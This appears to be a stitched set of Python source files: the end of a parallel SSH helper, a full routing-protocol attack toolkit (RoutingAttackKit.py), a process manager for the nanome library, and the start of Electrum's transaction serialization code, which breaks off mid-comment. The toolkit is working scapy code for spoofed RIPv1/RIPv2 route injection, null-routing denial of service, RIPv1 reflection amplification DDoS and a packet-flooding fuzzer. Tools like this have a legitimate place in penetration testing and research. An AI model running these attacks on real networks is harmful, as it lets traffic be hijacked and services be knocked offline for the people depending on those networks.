proc_stderr = proc[1].split('\n')[:-1]
self.ssh_out_tmp[num]['stderr'][server] = proc_stderr
if self.async:
for line in proc_stderr:
print server + ' ' + line
if not any([proc[0], proc[1]]):
ret_code = [str(proc0.returncode)]
self.ssh_out_tmp[num]['stderr'][server] = ret_code
if self.async:
for line in ret_code:
print server + ' ' + line
queue.task_done()
except:
self.ssh_out_tmp[num]['stderr'][server] = ['exception: ' + str(sys.exc_info()) + 'command: ' + str(command)]
queue.task_done()
return
def stats(self):
'''Print resulting output'''
log_file_name = self.args.get('log_file', os.environ['HOME'] + '/ssh.py_out')
if not self.args.get('no_logs', ''):
log_file = open(log_file_name, 'a')
stdout_sorted = self.ssh_out['stdout'].keys()
stdout_sorted.sort()
stderr_sorted = self.ssh_out['stderr'].keys()
stderr_sorted.sort()
if not self.args.get('no_logs', ''):
log_file.write(str(datetime.datetime.now()) + ' =====ssh_py=====\n')
for server in stdout_sorted:
for line in self.ssh_out['stdout'][server]:
out = server + ' ' + line
if not self.async:
print out
if not self.args.get('no_logs', ''):
log_file.write(out + '\n')
for server in stderr_sorted:
for line in self.ssh_out['stderr'][server]:
out = server + ' ' + line
if not self.async:
print out
if not self.args.get('no_logs', ''):
log_file.write(out + '\n')
if not self.args.get('no_logs', ''):
log_file.close()
# Main loop
if __name__ == '__main__':
C = Ssh()
# threading setup
target0 = C.ssh
queue = C.queue
for num in C.threads:
C.ssh_out_tmp[num] = { 'stdout': {}, 'stderr': {} }
thread = threading.Thread(target=target0, args=(num,))
thread.daemon = True
thread.start()
for server in C.servers:
queue.put(server)
queue.join()
for num in C.threads:
C.ssh_out['stdout'].update(C.ssh_out_tmp[num]['stdout'])
C.ssh_out['stderr'].update(C.ssh_out_tmp[num]['stderr'])
C.stats()
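# Example invocations (host and group names here are hypothetical; key=value
# arguments become options, everything else fills arg1/arg2 as in _get_args):
#   ./ssh.py web1,web2 uptime                      # run 'uptime' on two hosts over ssh
#   ./ssh.py all 'df -h' threads=20 config=./hosts # run on every host in the inventory
#   ./ssh.py mode=scp ./file.txt root@web1:/tmp/   # copy a local file to a host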
|
RoutingAttackKit.py
|
#!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer covering the RIPAuth and RIPEntry structures
#
# Python requirements:
# - scapy
#
# Mariusz Banach / mgeeky, '19, <[email protected]>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
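# For reference (hedged examples derived from the generators above): the
# get{8,16,32}bitFuzzes() helpers return integers clustered around powers of two
# (every 2**i - 2 .. 2**i + 1 that fits the bit width), e.g. get8bitFuzzes()
# contains ..., 127, 128, 129, 254, 255; the cyclic pattern generator yields
# Fuzzer.deBrujinPattern(12) == 'Aa0Aa1Aa2Aa3'.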
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
    def processPacket(self, pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
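# Example (illustrative values): with a config containing
#   {'auth-type': 'simple', 'auth-data': 's3cret'}
# RIPv1v2Attacks.getRipAuth(config) returns a RIPAuth layer with authtype == 2 and
# password == 's3cret'; getPacket() then inserts it between the RIP header and the
# RIPEntry (etherframe / ip / udp / rip / ripauth / ripentry).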
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
        global stopThreads
        packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz Banach / mgeeky '19, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
    if not args.attack:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
_process_manager.py
|
from collections import deque
import subprocess
import traceback
import sys
from threading import Thread
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty # python 2.x
from nanome._internal._process import _ProcessEntry
from nanome.util import Logs, IntEnum, auto
POSIX = 'posix' in sys.builtin_module_names
class _ProcessManager():
class _DataType(IntEnum):
queued = auto()
position_changed = auto()
starting = auto()
error = auto()
output = auto()
done = auto()
class _CommandType(IntEnum):
start = auto()
stop = auto()
_max_process_count = 10
def __init__(self):
self.__pending = deque()
self.__running = []
def _update(self):
try:
for i in range(len(self.__running) - 1, -1, -1):
proc = self.__running[i]
if self.__update_process(proc) == False:
del self.__running[i]
spawn_count = min(_ProcessManager._max_process_count - len(self.__running), len(self.__pending))
if spawn_count > 0:
while spawn_count > 0:
self.__start_process()
spawn_count -= 1
count_before_exec = 1
for entry in self.__pending:
entry.send(_ProcessManager._DataType.position_changed, [count_before_exec])
count_before_exec += 1
except:
Logs.error("Exception in process manager update:\n", traceback.format_exc())
def __start_process(self):
entry = self.__pending.popleft()
entry.send(_ProcessManager._DataType.starting, [])
request = entry.request
args = [request.executable_path] + request.args
has_text = entry.output_text
def enqueue_output(pipe, queue, text):
if text:
sentinel = ''
else:
sentinel = b''
for line in iter(pipe.readline, sentinel):
queue.put(line)
pipe.close()
try:
entry.process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1, cwd=request.cwd_path, universal_newlines=has_text, close_fds=POSIX)
Logs.debug("Process started:", request.executable_path, "for session", entry.session._session_id)
except:
Logs.error("Couldn't execute process", request.executable_path, "Please check if executable is present and has permissions:\n", traceback.format_exc())
entry.send(_ProcessManager._DataType.done, [-1])
return
entry.stdout_queue = Queue()
entry.stderr_queue = Queue()
thread_out = Thread(target=enqueue_output, args=(entry.process.stdout, entry.stdout_queue, has_text), daemon=True)
thread_err = Thread(target=enqueue_output, args=(entry.process.stderr, entry.stderr_queue, has_text), daemon=True)
thread_out.start()
thread_err.start()
self.__running.append(entry)
def __update_process(self, entry):
# Process stdout and stderr
if entry.output_text:
output = ""
error = ""
else:
output = b""
error = b""
try:
while True:
output += entry.stdout_queue.get_nowait()
except Empty:
pass
try:
while True:
error += entry.stderr_queue.get_nowait()
except Empty:
pass
# error = error[entry._processed_error:]
# entry._processed_error += len(error)
if error:
entry.send(_ProcessManager._DataType.error, [error])
# output = output[entry._processed_output:]
# entry._processed_output += len(output)
if output:
entry.send(_ProcessManager._DataType.output, [output])
# Check if process finished
return_value = entry.process.poll()
if return_value is not None:
# Finish process
entry.send(_ProcessManager._DataType.done, [return_value])
return False
return True
def __stop_process(self, id):
for entry in self.__running:
if entry.request.id == id:
entry.process.terminate()
break
def _remove_session_processes(self, session_id):
pending = [e for e in self.__pending if e.session._session_id == session_id]
running = [e for e in self.__running if e.session._session_id == session_id]
for entry in pending:
self.__pending.remove(entry)
for entry in running:
entry.process.kill()
self.__running.remove(entry)
def _received_request(self, data, session):
type = data[0]
if type == _ProcessManager._CommandType.start:
request = data[1]
entry = _ProcessEntry(request, session)
self.__pending.append(entry)
session.send_process_data([_ProcessManager._DataType.queued, request])
elif type == _ProcessManager._CommandType.stop:
self.__stop_process(data[1])
else:
Logs.error("Received unknown process command type")
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(Exception):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
    def read_boolean(self): return self.read_bytes(1)[0] != 0
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
    def write_boolean(self, val): return self.write(b'\x01' if val else b'\x00')
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
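# Example (for reference) of the CompactSize encoding implemented above:
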